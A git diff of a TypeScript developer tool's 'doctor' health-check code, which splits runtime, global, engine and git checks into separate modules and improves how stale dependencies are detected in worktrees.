-          fixesApplied.push(`cleaned up stale parallel session for ${status.milestoneId}`);
-        }
-      }
-    }
-  } catch {
-    // Non-fatal — parallel session check failed
-  }
-
-  // ── Orphaned completed-units keys ─────────────────────────────────────
-  try {
-    const completedKeysFile = join(root, "completed-units.json");
-    if (existsSync(completedKeysFile)) {
-      const raw = readFileSync(completedKeysFile, "utf-8");
-      const keys: string[] = JSON.parse(raw);
-      const orphaned: string[] = [];
-
-      for (const key of keys) {
-        // Key format: "unitType/unitId" e.g. "execute-task/M001/S01/T01"
-        const slashIdx = key.indexOf("/");
-        if (slashIdx === -1) continue;
-        const unitType = key.slice(0, slashIdx);
-        const unitId = key.slice(slashIdx + 1);
-
-        // Only validate artifact-producing unit types
-        const { verifyExpectedArtifact } = await import("./auto-recovery.js");
-        if (!verifyExpectedArtifact(unitType, unitId, basePath)) {
-          orphaned.push(key);
-        }
-      }
-
-      if (orphaned.length > 0) {
-        issues.push({
-          severity: "warning",
-          code: "orphaned_completed_units",
-          scope: "project",
-          unitId: "project",
-          message: `${orphaned.length} completed-unit key(s) reference missing artifacts: ${orphaned.slice(0, 3).join(", ")}${orphaned.length > 3 ? "..." : ""}`,
-          file: ".gsd/completed-units.json",
-          fixable: true,
-        });
-
-        if (shouldFix("orphaned_completed_units")) {
-          const orphanedSet = new Set(orphaned);
-          const remaining = keys.filter((key) => !orphanedSet.has(key));
-          await saveFile(completedKeysFile, JSON.stringify(remaining));
-          fixesApplied.push(`removed ${orphaned.length} orphaned completed-unit key(s)`);
-        }
-      }
-    }
-  } catch {
-    // Non-fatal — completed-units check failed
-  }
-
-  // ── Stale hook state ──────────────────────────────────────────────────
-  try {
-    const hookStateFile = join(root, "hook-state.json");
-    if (existsSync(hookStateFile)) {
-      const raw = readFileSync(hookStateFile, "utf-8");
-      const state = JSON.parse(raw);
-      const hasCycleCounts = state.cycleCounts && typeof state.cycleCounts === "object"
-        && Object.keys(state.cycleCounts).length > 0;
-
-      // Only flag if there are actual cycle counts AND no auto-mode is running
-      if (hasCycleCounts) {
-        const lock = readCrashLock(basePath);
-        const autoRunning = lock ? isLockProcessAlive(lock) : false;
-
-        if (!autoRunning) {
-          issues.push({
-            severity: "info",
-            code: "stale_hook_state",
-            scope: "project",
-            unitId: "project",
-            message: `hook-state.json has ${Object.keys(state.cycleCounts).length} residual cycle count(s) from a previous session`,
-            file: ".gsd/hook-state.json",
-            fixable: true,
-          });
-
-          if (shouldFix("stale_hook_state")) {
-            const { clearPersistedHookState } = await import("./post-unit-hooks.js");
-            clearPersistedHookState(basePath);
-            fixesApplied.push("cleared stale hook-state.json");
-          }
-        }
-      }
-    }
-  } catch {
-    // Non-fatal — hook state check failed
-  }
-
-  // ── Activity log bloat ────────────────────────────────────────────────
-  try {
-    const activityDir = join(root, "activity");
-    if (existsSync(activityDir)) {
-      const files = readdirSync(activityDir);
-      let totalSize = 0;
-      for (const f of files) {
-        try {
-          totalSize += statSync(join(activityDir, f)).size;
-        } catch {
-          // stat failed — skip
-        }
-      }
-
-      const totalMB = totalSize / (1024 * 1024);
-      const BLOAT_FILE_THRESHOLD = 500;
-      const BLOAT_SIZE_MB = 100;
-
-      if (files.length > BLOAT_FILE_THRESHOLD || totalMB > BLOAT_SIZE_MB) {
-        issues.push({
-          severity: "warning",
-          code: "activity_log_bloat",
-          scope: "project",
-          unitId: "project",
-          message: `Activity logs: ${files.length} files, ${totalMB.toFixed(1)}MB (thresholds: ${BLOAT_FILE_THRESHOLD} files / ${BLOAT_SIZE_MB}MB)`,
-          file: ".gsd/activity/",
-          fixable: true,
-        });
-
-        if (shouldFix("activity_log_bloat")) {
-          const { pruneActivityLogs } = await import("./activity-log.js");
-          pruneActivityLogs(activityDir, 7); // 7-day retention
-          fixesApplied.push("pruned activity logs (7-day retention)");
-        }
-      }
-    }
-  } catch {
-    // Non-fatal — activity log check failed
-  }
-
-  // ── STATE.md health ───────────────────────────────────────────────────
-  try {
-    const stateFilePath = resolveGsdRootFile(basePath, "STATE");
-    const milestonesPath = milestonesDir(basePath);
-
-    if (existsSync(milestonesPath)) {
-      if (!existsSync(stateFilePath)) {
-        issues.push({
-          severity: "warning",
-          code: "state_file_missing",
-          scope: "project",
-          unitId: "project",
-          message: "STATE.md is missing — state display will not work",
-          file: ".gsd/STATE.md",
-          fixable: true,
-        });
-
-        if (shouldFix("state_file_missing")) {
-          const state = await deriveState(basePath);
-          await saveFile(stateFilePath, buildStateMarkdownForCheck(state));
-          fixesApplied.push("created STATE.md from derived state");
-        }
-      } else {
-        // Check if STATE.md is stale by comparing active milestone/slice/phase
-        const currentContent = readFileSync(stateFilePath, "utf-8");
-        const state = await deriveState(basePath);
-        const freshContent = buildStateMarkdownForCheck(state);
-
-        // Extract key fields for comparison — don't compare full content
-        // since timestamp/formatting differences are normal
-        const extractFields = (content: string) => {
-          const milestone = content.match(/\*\*Active Milestone:\*\*\s*(.+)/)?.[1]?.trim() ?? "";
-          const slice = content.match(/\*\*Active Slice:\*\*\s*(.+)/)?.[1]?.trim() ?? "";
-          const phase = content.match(/\*\*Phase:\*\*\s*(.+)/)?.[1]?.trim() ?? "";
-          return { milestone, slice, phase };
-        };
-
-        const current = extractFields(currentContent);
-        const fresh = extractFields(freshContent);
-
-        if (current.milestone !== fresh.milestone || current.slice !== fresh.slice || current.phase !== fresh.phase) {
-          issues.push({
-            severity: "warning",
-            code: "state_file_stale",
-            scope: "project",
-            unitId: "project",
-            message: `STATE.md is stale — shows "${current.phase}" but derived state is "${fresh.phase}"`,
-            file: ".gsd/STATE.md",
-            fixable: true,
-          });
-
-          if (shouldFix("state_file_stale")) {
-            await saveFile(stateFilePath, freshContent);
-            fixesApplied.push("rebuilt STATE.md from derived state");
-          }
-        }
-      }
-    }
-  } catch {
-    // Non-fatal — STATE.md check failed
-  }
-
-  // ── Gitignore drift ───────────────────────────────────────────────────
-  try {
-    const gitignorePath = join(basePath, ".gitignore");
-    if (existsSync(gitignorePath) && nativeIsRepo(basePath)) {
-      const content = readFileSync(gitignorePath, "utf-8");
-      const existingLines = new Set(
-        content.split("\n").map(l => l.trim()).filter(l => l && !l.startsWith("#")),
-      );
-
-      // Check for critical runtime patterns that must be present
-      const criticalPatterns = [
-        ".gsd/activity/",
-        ".gsd/runtime/",
-        ".gsd/auto.lock",
-        ".gsd/gsd.db",
-        ".gsd/completed-units.json",
-      ];
-
-      // If blanket .gsd/ or .gsd is present, all patterns are covered
-      const hasBlanketIgnore = existingLines.has(".gsd/") || existingLines.has(".gsd");
-
-      if (!hasBlanketIgnore) {
-        const missing = criticalPatterns.filter(p => !existingLines.has(p));
-        if (missing.length > 0) {
-          issues.push({
-            severity: "warning",
-            code: "gitignore_missing_patterns",
-            scope: "project",
-            unitId: "project",
-            message: `${missing.length} critical GSD runtime pattern(s) missing from .gitignore: ${missing.join(", ")}`,
-            file: ".gitignore",
-            fixable: true,
-          });
-
-          if (shouldFix("gitignore_missing_patterns")) {
-            ensureGitignore(basePath);
-            fixesApplied.push("added missing GSD runtime patterns to .gitignore");
-          }
-        }
-      }
-    }
-  } catch {
-    // Non-fatal — gitignore check failed
-  }
-
-  // ── External state symlink health ──────────────────────────────────────
-  try {
-    const localGsd = join(basePath, ".gsd");
-    if (existsSync(localGsd)) {
-      const stat = lstatSync(localGsd);
-
-      // Check for .gsd.migrating (failed migration)
-      const migratingPath = join(basePath, ".gsd.migrating");
-      if (existsSync(migratingPath)) {
-        issues.push({
-          severity: "error",
-          code: "failed_migration",
-          scope: "project",
-          unitId: "project",
-          message: "Found .gsd.migrating — a previous external state migration failed. State may be incomplete.",
-          file: ".gsd.migrating",
-          fixable: true,
-        });
-
-        if (shouldFix("failed_migration")) {
-          if (recoverFailedMigration(basePath)) {
-            fixesApplied.push("recovered failed migration (.gsd.migrating → .gsd)");
-          }
-        }
-      }
-
-      // Check symlink target exists
-      if (stat.isSymbolicLink()) {
-        try {
-          realpathSync(localGsd);
-        } catch {
-          issues.push({
-            severity: "error",
-            code: "broken_symlink",
-            scope: "project",
-            unitId: "project",
-            message: ".gsd symlink target does not exist. External state directory may have been deleted.",
-            file: ".gsd",
-            fixable: false,
-          });
-        }
-      }
-    }
-  } catch {
-    // Non-fatal — external state check failed
-  }
-
-  // ── Metrics ledger integrity ───────────────────────────────────────────
-  try {
-    const metricsPath = join(root, "metrics.json");
-    if (existsSync(metricsPath)) {
-      try {
-        const raw = readFileSync(metricsPath, "utf-8");
-        const ledger = JSON.parse(raw);
-        if (ledger.version !== 1 || !Array.isArray(ledger.units)) {
-          issues.push({
-            severity: "warning",
-            code: "metrics_ledger_corrupt",
-            scope: "project",
-            unitId: "project",
-            message: "metrics.json has an unexpected structure (version !== 1 or units is not an array) — metrics data may be unreliable",
-            file: ".gsd/metrics.json",
-            fixable: false,
-          });
-        }
-      } catch {
-        issues.push({
-          severity: "warning",
-          code: "metrics_ledger_corrupt",
-          scope: "project",
-          unitId: "project",
-          message: "metrics.json is not valid JSON — metrics data may be corrupt",
-          file: ".gsd/metrics.json",
-          fixable: false,
-        });
-      }
-    }
-  } catch {
-    // Non-fatal — metrics check failed
-  }
-
-  // ── Metrics ledger bloat ──────────────────────────────────────────────
-  // The metrics ledger has no TTL and grows by one entry per completed unit.
-  // At 50 units/day a project can accumulate tens of thousands of entries over
-  // months of use. Prune to the newest 1500 when the threshold is exceeded.
-  try {
-    const metricsFilePath = join(root, "metrics.json");
-    if (existsSync(metricsFilePath)) {
-      try {
-        const raw = readFileSync(metricsFilePath, "utf-8");
-        const parsed = JSON.parse(raw);
-        const BLOAT_UNITS_THRESHOLD = 2000;
-        if (parsed.version === 1 && Array.isArray(parsed.units) && parsed.units.length > BLOAT_UNITS_THRESHOLD) {
-          const fileSizeMB = (statSync(metricsFilePath).size / (1024 * 1024)).toFixed(1);
-          issues.push({
-            severity: "warning",
-            code: "metrics_ledger_bloat",
-            scope: "project",
-            unitId: "project",
-            message: `metrics.json has ${parsed.units.length} unit entries (${fileSizeMB}MB) — threshold is ${BLOAT_UNITS_THRESHOLD}. Run /gsd doctor --fix to prune to the newest 1500 entries.`,
-            file: ".gsd/metrics.json",
-            fixable: true,
-          });
-          if (shouldFix("metrics_ledger_bloat")) {
-            const { pruneMetricsLedger } = await import("./metrics.js");
-            const removed = pruneMetricsLedger(basePath, 1500);
-            fixesApplied.push(`pruned metrics ledger: removed ${removed} oldest entries (${parsed.units.length - removed} remain)`);
-          }
-        }
-      } catch {
-        // JSON parse failed — already handled by the integrity check above
-      }
-    }
-  } catch {
-    // Non-fatal — metrics bloat check failed
-  }
-
-  // ── Large planning file detection ──────────────────────────────────────
-  // Files over 100KB can cause LLM context pressure. Report the worst offenders.
-  try {
-    const MAX_FILE_BYTES = 100 * 1024; // 100KB
-    const milestonesPath = milestonesDir(basePath);
-    if (existsSync(milestonesPath)) {
-      const largeFiles: Array<{ path: string; sizeKB: number }> = [];
-      function scanForLargeFiles(dir: string, depth = 0): void {
-        if (depth > 6) return;
-        try {
-          for (const entry of readdirSync(dir)) {
-            const full = join(dir, entry);
-            try {
-              const s = statSync(full);
-              if (s.isDirectory()) { scanForLargeFiles(full, depth + 1); continue; }
-              if (entry.endsWith(".md") && s.size > MAX_FILE_BYTES) {
-                largeFiles.push({ path: full.replace(basePath + "/", ""), sizeKB: Math.round(s.size / 1024) });
-              }
-            } catch { /* skip entry */ }
-          }
-        } catch { /* skip dir */ }
-      }
-      scanForLargeFiles(milestonesPath);
-      if (largeFiles.length > 0) {
-        largeFiles.sort((a, b) => b.sizeKB - a.sizeKB);
-        const worst = largeFiles[0]!;
-        issues.push({
-          severity: "warning",
-          code: "large_planning_file",
-          scope: "project",
-          unitId: "project",
-          message: `${largeFiles.length} planning file(s) exceed 100KB — largest: ${worst.path} (${worst.sizeKB}KB). Large files cause LLM context pressure.`,
-          file: worst.path,
-          fixable: false,
-        });
-      }
-    }
-  } catch {
-    // Non-fatal — large file scan failed
-  }
-
-  // ── Snapshot ref bloat ────────────────────────────────────────────────
-  // refs/gsd/snapshots/ accumulate over time. Prune to newest 5 per label
-  // when total count exceeds threshold.
-  try {
-    if (nativeIsRepo(basePath)) {
-      const refs = nativeForEachRef(basePath, "refs/gsd/snapshots/");
-      if (refs.length > 50) {
-        issues.push({
-          severity: "warning",
-          code: "snapshot_ref_bloat",
-          scope: "project",
-          unitId: "project",
-          message: `${refs.length} snapshot refs found under refs/gsd/snapshots/ — pruning to newest 5 per label will reclaim git storage`,
-          fixable: true,
-        });
-
-        if (shouldFix("snapshot_ref_bloat")) {
-          const byLabel = new Map<string, string[]>();
-          for (const ref of refs) {
-            const parts = ref.split("/");
-            const label = parts.slice(0, -1).join("/");
-            if (!byLabel.has(label)) byLabel.set(label, []);
-            byLabel.get(label)!.push(ref);
-          }
-          let pruned = 0;
-          for (const [, labelRefs] of byLabel) {
-            const sorted = labelRefs.sort();
-            for (const old of sorted.slice(0, -5)) {
-              try {
-                nativeUpdateRef(basePath, old);
-                pruned++;
-              } catch { /* skip */ }
-            }
-          }
-          if (pruned > 0) {
-            fixesApplied.push(`pruned ${pruned} old snapshot ref(s)`);
-          }
-        }
-      }
-    }
-  } catch {
-    // Non-fatal — snapshot ref check failed
-  }
-}
-
-/**
- * Build STATE.md markdown content from derived state.
- * Local helper used by checkRuntimeHealth for STATE.md drift detection and repair.
- */
-function buildStateMarkdownForCheck(state: Awaited<ReturnType<typeof deriveState>>): string {
-  const lines: string[] = [];
-  lines.push("# GSD State", "");
-
-  const activeMilestone = state.activeMilestone
-    ? `${state.activeMilestone.id}: ${state.activeMilestone.title}`
-    : "None";
-  const activeSlice = state.activeSlice
-    ? `${state.activeSlice.id}: ${state.activeSlice.title}`
-    : "None";
-
-  lines.push(`**Active Milestone:** ${activeMilestone}`);
-  lines.push(`**Active Slice:** ${activeSlice}`);
-  lines.push(`**Phase:** ${state.phase}`);
-  if (state.requirements) {
-    lines.push(`**Requirements Status:** ${state.requirements.active} active · ${state.requirements.validated} validated · ${state.requirements.deferred} deferred · ${state.requirements.outOfScope} out of scope`);
-  }
-  lines.push("");
-  lines.push("## Milestone Registry");
-
-  for (const entry of state.registry) {
-    const glyph = entry.status === "complete" ? "\u2705" : entry.status === "active" ? "\uD83D\uDD04" : entry.status === "parked" ? "\u23F8\uFE0F" : "\u2B1C";
-    lines.push(`- ${glyph} **${entry.id}:** ${entry.title}`);
-  }
-
-  lines.push("");
-  lines.push("## Recent Decisions");
-  if (state.recentDecisions.length > 0) {
-    for (const decision of state.recentDecisions) lines.push(`- ${decision}`);
-  } else {
-    lines.push("- None recorded");
-  }
-
-  lines.push("");
-  lines.push("## Blockers");
-  if (state.blockers.length > 0) {
-    for (const blocker of state.blockers) lines.push(`- ${blocker}`);
-  } else {
-    lines.push("- None");
-  }
-
-  lines.push("");
-  lines.push("## Next Action");
-  lines.push(state.nextAction || "None");
-  lines.push("");
-
-  return lines.join("\n");
-}
-
-// ── Global Health Checks ────────────────────────────────────────────────────
-// Cross-project checks that scan ~/.gsd/ rather than a specific project directory.
-
-/**
- * Check for orphaned project state directories in ~/.gsd/projects/.
- *
- * A project directory is orphaned when its recorded gitRoot no longer exists
- * on disk — the repo was deleted, moved, or the external drive was unmounted.
- * These directories accumulate silently and waste disk space.
- *
- * Severity: info — orphaned state is harmless but takes disk space.
- * Fixable: yes — rmSync the directory. Never auto-fixed at fixLevel="task".
- */
-export async function checkGlobalHealth(
-  issues: DoctorIssue[],
-  fixesApplied: string[],
-  shouldFix: (code: DoctorIssueCode) => boolean,
-): Promise<void> {
-  try {
-    const projectsDir = externalProjectsRoot();
-
-    if (!existsSync(projectsDir)) return;
-
-    let entries: string[];
-    try {
-      entries = readdirSync(projectsDir, { withFileTypes: true })
-        .filter(e => e.isDirectory())
-        .map(e => e.name);
-    } catch {
-      return; // Can't read directory — skip
-    }
-
-    if (entries.length === 0) return;
-
-    const orphaned: Array<{ hash: string; gitRoot: string; remoteUrl: string }> = [];
-    let unknownCount = 0;
-
-    for (const hash of entries) {
-      const dirPath = join(projectsDir, hash);
-      const meta = readRepoMeta(dirPath);
-      if (!meta) {
-        unknownCount++;
-        continue;
-      }
-      if (!existsSync(meta.gitRoot)) {
-        orphaned.push({ hash, gitRoot: meta.gitRoot, remoteUrl: meta.remoteUrl });
-      }
-    }
-
-    if (orphaned.length === 0) return;
-
-    const labels = orphaned.slice(0, 3).map(o => o.gitRoot).join(", ");
-    const overflow = orphaned.length > 3 ? ` (+${orphaned.length - 3} more)` : "";
-    const unknownNote = unknownCount > 0 ? ` — ${unknownCount} additional director${unknownCount === 1 ? "y" : "ies"} have no metadata yet (open those repos once to register them)` : "";
-
-    issues.push({
-      severity: "info",
-      code: "orphaned_project_state",
-      scope: "project",
-      unitId: "global",
-      message: `${orphaned.length} orphaned GSD project state director${orphaned.length === 1 ? "y" : "ies"} in ${projectsDir} whose git root no longer exists: ${labels}${overflow}${unknownNote}. Run /gsd cleanup projects to audit or /gsd cleanup projects --fix to reclaim disk space.`,
-      file: projectsDir,
-      fixable: true,
-    });
-
-    if (shouldFix("orphaned_project_state")) {
-      let removed = 0;
-      for (const { hash } of orphaned) {
-        try {
-          rmSync(join(projectsDir, hash), { recursive: true, force: true });
-          removed++;
-        } catch {
-          // Individual removal failure is non-fatal — continue with remaining
-        }
-      }
-      fixesApplied.push(`removed ${removed} orphaned project state director${removed === 1 ? "y" : "ies"} from ${projectsDir}`);
-    }
-  } catch {
-    // Non-fatal — global health check must not block per-project doctor
-  }
-}
+// Re-exports for backward compatibility
+export { checkGitHealth } from "./doctor-git-checks.js";
+export { checkRuntimeHealth } from "./doctor-runtime-checks.js";
+export { checkGlobalHealth } from "./doctor-global-checks.js";
+export { checkEngineHealth } from "./doctor-engine-checks.js";
diff --git a/src/resources/extensions/gsd/doctor-engine-checks.ts b/src/resources/extensions/gsd/doctor-engine-checks.ts
new file mode 100644
index 000000000..8b74dcac4
--- /dev/null
+++ b/src/resources/extensions/gsd/doctor-engine-checks.ts
@@ -0,0 +1,182 @@
+import { existsSync, statSync } from "node:fs";
+import { join } from "node:path";
+
+import type { DoctorIssue } from "./doctor-types.js";
+import { isDbAvailable, _getAdapter } from "./gsd-db.js";
+import { resolveMilestoneFile } from "./paths.js";
+import { deriveState } from "./state.js";
+import { readEvents } from "./workflow-events.js";
+import { renderAllProjections } from "./workflow-projections.js";
+
+export async function checkEngineHealth(
+  basePath: string,
+  issues: DoctorIssue[],
+  fixesApplied: string[],
+): Promise<void> {
+  // ── DB constraint violation detection (full doctor only, not pre-dispatch per D-10) ──
+  try {
+    if (isDbAvailable()) {
+      const adapter = _getAdapter()!;
+
+      // a. Orphaned tasks (task.slice_id points to non-existent slice)
+      try {
+        const orphanedTasks = adapter
+          .prepare(
+            `SELECT t.id, t.slice_id, t.milestone_id
+             FROM tasks t
+             LEFT JOIN slices s ON t.milestone_id = s.milestone_id AND t.slice_id = s.id
+             WHERE s.id IS NULL`,
+          )
+          .all() as Array<{ id: string; slice_id: string; milestone_id: string }>;
+
+        for (const row of orphanedTasks) {
+          issues.push({
+            severity: "error",
+            code: "db_orphaned_task",
+            scope: "task",
+            unitId: `${row.milestone_id}/${row.slice_id}/${row.id}`,
+            message: `Task ${row.id} references slice ${row.slice_id} in milestone ${row.milestone_id} but no such slice exists in the database`,
+            fixable: false,
+          });
+        }
+      } catch {
+        // Non-fatal — orphaned task check failed
+      }
+
+      // b. Orphaned slices (slice.milestone_id points to non-existent milestone)
+      try {
+        const orphanedSlices = adapter
+          .prepare(
+            `SELECT s.id, s.milestone_id
+             FROM slices s
+             LEFT JOIN milestones m ON s.milestone_id = m.id
+             WHERE m.id IS NULL`,
+          )
+          .all() as Array<{ id: string; milestone_id: string }>;
+
+        for (const row of orphanedSlices) {
+          issues.push({
+            severity: "error",
+            code: "db_orphaned_slice",
+            scope: "slice",
+            unitId: `${row.milestone_id}/${row.id}`,
+            message: `Slice ${row.id} references milestone ${row.milestone_id} but no such milestone exists in the database`,
+            fixable: false,
+          });
+        }
+      } catch {
+        // Non-fatal — orphaned slice check failed
+      }
+
+      // c. Tasks marked complete without summaries
+      try {
+        const doneTasks = adapter
+          .prepare(
+            `SELECT id, slice_id, milestone_id FROM tasks
+             WHERE status = 'done' AND (summary IS NULL OR summary = '')`,
+          )
+          .all() as Array<{ id: string; slice_id: string; milestone_id: string }>;
+
+        for (const row of doneTasks) {
+          issues.push({
+            severity: "warning",
+            code: "db_done_task_no_summary",
+            scope: "task",
+            unitId: `${row.milestone_id}/${row.slice_id}/${row.id}`,
+            message: `Task ${row.id} is marked done but has no summary in the database`,
+            fixable: false,
+          });
+        }
+      } catch {
+        // Non-fatal — done-task-no-summary check failed
+      }
+
+      // d. Duplicate entity IDs (safety check)
+      try {
+        const dupMilestones = adapter
+          .prepare("SELECT id, COUNT(*) as cnt FROM milestones GROUP BY id HAVING cnt > 1")
+          .all() as Array<{ id: string; cnt: number }>;
+        for (const row of dupMilestones) {
+          issues.push({
+            severity: "error",
+            code: "db_duplicate_id",
+            scope: "milestone",
+            unitId: row.id,
+            message: `Duplicate milestone ID "${row.id}" appears ${row.cnt} times in the database`,
+            fixable: false,
+          });
+        }
+
+        const dupSlices = adapter
+          .prepare("SELECT id, milestone_id, COUNT(*) as cnt FROM slices GROUP BY id, milestone_id HAVING cnt > 1")
+          .all() as Array<{ id: string; milestone_id: string; cnt: number }>;
+        for (const row of dupSlices) {
+          issues.push({
+            severity: "error",
+            code: "db_duplicate_id",
+            scope: "slice",
+            unitId: `${row.milestone_id}/${row.id}`,
+            message: `Duplicate slice ID "${row.id}" in milestone ${row.milestone_id} appears ${row.cnt} times`,
+            fixable: false,
+          });
+        }
+
+        const dupTasks = adapter
+          .prepare("SELECT id, slice_id, milestone_id, COUNT(*) as cnt FROM tasks GROUP BY id, slice_id, milestone_id HAVING cnt > 1")
+          .all() as Array<{ id: string; slice_id: string; milestone_id: string; cnt: number }>;
+        for (const row of dupTasks) {
+          issues.push({
+            severity: "error",
+            code: "db_duplicate_id",
+            scope: "task",
+            unitId: `${row.milestone_id}/${row.slice_id}/${row.id}`,
+            message: `Duplicate task ID "${row.id}" in slice ${row.slice_id} appears ${row.cnt} times`,
+            fixable: false,
+          });
+        }
+      } catch {
+        // Non-fatal — duplicate ID check failed
+      }
+    }
+  } catch {
+    // Non-fatal — DB constraint checks failed entirely
+  }
+
+  // ── Projection drift detection ──────────────────────────────────────────
+  // If the DB is available, check whether markdown projections are stale
+  // relative to the event log and re-render them.
+  try {
+    if (isDbAvailable()) {
+      const eventLogPath = join(basePath, ".gsd", "event-log.jsonl");
+      const events = readEvents(eventLogPath);
+      if (events.length > 0) {
+        const lastEventTs = new Date(events[events.length - 1]!.ts).getTime();
+        const state = await deriveState(basePath);
+        for (const milestone of state.registry) {
+          if (milestone.status === "complete") continue;
+          const roadmapPath = resolveMilestoneFile(basePath, milestone.id, "ROADMAP");
+          if (!roadmapPath || !existsSync(roadmapPath)) {
+            try {
+              await renderAllProjections(basePath, milestone.id);
+              fixesApplied.push(`re-rendered missing projections for ${milestone.id}`);
+            } catch {
+              // Non-fatal — projection re-render failed
+            }
+            continue;
+          }
+          const projectionMtime = statSync(roadmapPath).mtimeMs;
+          if (lastEventTs > projectionMtime) {
+            try {
+              await renderAllProjections(basePath, milestone.id);
+              fixesApplied.push(`re-rendered stale projections for ${milestone.id}`);
+            } catch {
+              // Non-fatal — projection re-render failed
+            }
+          }
+        }
+      }
+    }
+  } catch {
+    // Non-fatal — projection drift check must never block doctor
+  }
+}
diff --git a/src/resources/extensions/gsd/doctor-environment.ts b/src/resources/extensions/gsd/doctor-environment.ts
index 61f61cd85..563afdbb4 100644
--- a/src/resources/extensions/gsd/doctor-environment.ts
+++ b/src/resources/extensions/gsd/doctor-environment.ts
@@ -37,6 +37,29 @@ const CMD_TIMEOUT = 5_000;
 
 // ── Helpers ────────────────────────────────────────────────────────────────
 
+/** Worktree sentinel — path segment that marks an auto-worktree directory. */
+const WORKTREE_PATH_SEGMENT = `${join(".gsd", "worktrees")}/`;
+
+/**
+ * Resolve the project root when running inside a `.gsd/worktrees/<name>/`
+ * auto-worktree. Returns `null` if not in a worktree.
+ *
+ * Detection order:
+ *   1. `GSD_WORKTREE` env var (set by the worktree launcher)
+ *   2. `.gsd/worktrees/` segment in basePath
+ */
+function resolveWorktreeProjectRoot(basePath: string): string | null {
+  const envRoot = process.env.GSD_WORKTREE;
+  if (envRoot) return envRoot;
+
+  const normalised = basePath.replace(/\\/g, "/");
+  const idx = normalised.indexOf(WORKTREE_PATH_SEGMENT.replace(/\\/g, "/"));
+  if (idx === -1) return null;
+
+  // Everything before `.gsd/worktrees/` is the project root
+  return basePath.slice(0, idx);
+}
+
 function tryExec(cmd: string, cwd: string): string | null {
   try {
     return execSync(cmd, {
@@ -111,6 +134,14 @@ function checkDependenciesInstalled(basePath: string): EnvironmentCheckResult |
 
   const nodeModules = join(basePath, "node_modules");
   if (!existsSync(nodeModules)) {
+    // In auto-worktrees node_modules is absent by design — the worktree
+    // symlinks to (or expects) the project root's copy.  Fall back to
+    // checking the project root before reporting an error (#2303).
+    const projectRoot = resolveWorktreeProjectRoot(basePath);
+    if (projectRoot && existsSync(join(projectRoot, "node_modules"))) {
+      return { name: "dependencies", status: "ok", message: "Dependencies installed (project root)" };
+    }
+
     return {
       name: "dependencies",
       status: "error",
@@ -118,21 +149,44 @@ function checkDependenciesInstalled(basePath: string): EnvironmentCheckResult |
     };
   }
 
-  // Check if lockfile is newer than node_modules
-  const lockfiles = ["package-lock.json", "yarn.lock", "pnpm-lock.yaml"];
-  for (const lockfile of lockfiles) {
-    const lockPath = join(basePath, lockfile);
+  // Check if lockfile is newer than the last install.
+  //
+  // Each package manager writes a metadata marker inside node_modules on
+  // every install. Comparing the lockfile mtime against the marker is
+  // reliable; comparing against the node_modules *directory* mtime is not,
+  // because directory mtime only changes when entries are added or removed
+  // — not when files inside it are updated. (#1974)
+  const lockfiles: Array<{ lock: string; markers: string[] }> = [
+    { lock: "package-lock.json", markers: ["node_modules/.package-lock.json"] },
+    { lock: "yarn.lock",         markers: ["node_modules/.yarn-integrity"] },
+    { lock: "pnpm-lock.yaml",    markers: ["node_modules/.modules.yaml"] },
+  ];
+
+  for (const { lock, markers } of lockfiles) {
+    const lockPath = join(basePath, lock);
     if (!existsSync(lockPath)) continue;
 
     try {
       const lockMtime = statSync(lockPath).mtimeMs;
-      const nmMtime = statSync(nodeModules).mtimeMs;
 
-      if (lockMtime > nmMtime) {
+      // Prefer the package manager's marker file; fall back to directory mtime
+      // only when no marker exists (e.g., manually created node_modules).
+      let installMtime = 0;
+      for (const marker of markers) {
+        const markerPath = join(basePath, marker);
+        if (existsSync(markerPath)) {
+          installMtime = Math.max(installMtime, statSync(markerPath).mtimeMs);
+        }
+      }
+      if (installMtime === 0) {
+        installMtime = statSync(nodeModules).mtimeMs;
+      }
+
+      if (lockMtime > installMtime) {
         return {
           name: "dependencies",
           status: "warning",
-          message: `${lockfile} is newer than node_modules — dependencies may be stale`,
+          message: `${lock} is newer than node_modules — dependencies may be stale`,
           detail: `Run npm install / yarn / pnpm install to update`,
         };
       }
diff --git a/src/resources/extensions/gsd/doctor-git-checks.ts b/src/resources/extensions/gsd/doctor-git-checks.ts
new file mode 100644
index 000000000..36b2eb5eb
--- /dev/null
+++ b/src/resources/extensions/gsd/doctor-git-checks.ts
@@ -0,0 +1,489 @@
+import { existsSync, readdirSync, realpathSync, rmSync, statSync } from "node:fs";
+import { join, sep } from "node:path";
+
+import type { DoctorIssue, DoctorIssueCode } from "./doctor-types.js";
+import { loadFile } from "./files.js";
+import { parseRoadmap as parseLegacyRoadmap } from "./parsers-legacy.js";
+import { isDbAvailable, getMilestoneSlices } from "./gsd-db.js";
+import { resolveMilestoneFile } from "./paths.js";
+import { deriveState, isMilestoneComplete } from "./state.js";
+import { listWorktrees, resolveGitDir, worktreesDir } from "./worktree-manager.js";
+import { abortAndReset } from "./git-self-heal.js";
+import { RUNTIME_EXCLUSION_PATHS, resolveMilestoneIntegrationBranch, writeIntegrationBranch } from "./git-service.js";
+import { nativeIsRepo, nativeWorktreeList, nativeWorktreeRemove, nativeBranchList, nativeBranchDelete, nativeLsFiles, nativeRmCached, nativeHasChanges, nativeLastCommitEpoch, nativeGetCurrentBranch, nativeAddAllWithExclusions, nativeCommit } from "./native-git-bridge.js";
+import { getAllWorktreeHealth } from "./worktree-health.js";
+import { loadEffectiveGSDPreferences } from "./preferences.js";
+
+/**
+ * Returns true if the directory contains only doctor artifacts
+ * (e.g. `.gsd/doctor-history.jsonl`). These dirs are created by
+ * appendDoctorHistory() writing to worktree-scoped paths during the audit
+ * and should not be flagged as orphaned worktrees (#3105).
+ */
+function isDoctorArtifactOnly(dirPath: string): boolean {
+  try {
+    const entries = readdirSync(dirPath);
+    // Empty dir — not a doctor artifact, still orphaned
+    if (entries.length === 0) return false;
+    // Only a .gsd subdirectory
+    if (entries.length === 1 && entries[0] === ".gsd") {
+      const gsdEntries = readdirSync(join(dirPath, ".gsd"));
+      return gsdEntries.length <= 1 && gsdEntries.every(e => e === "doctor-history.jsonl");
+    }
+    return false;
+  } catch {
+    return false;
+  }
+}
+
+export async function checkGitHealth(
+  basePath: string,
+  issues: DoctorIssue[],
+  fixesApplied: string[],
+  shouldFix: (code: DoctorIssueCode) => boolean,
+  isolationMode: "none" | "worktree" | "branch" = "none",
+): Promise<void> {
+  // Degrade gracefully if not a git repo
+  if (!nativeIsRepo(basePath)) {
+    return; // Not a git repo — skip all git health checks
+  }
+
+  const gitDir = resolveGitDir(basePath);
+
+  // ── Orphaned auto-worktrees & Stale milestone branches ────────────────
+  // These checks only apply in worktree/branch modes — skip in none mode
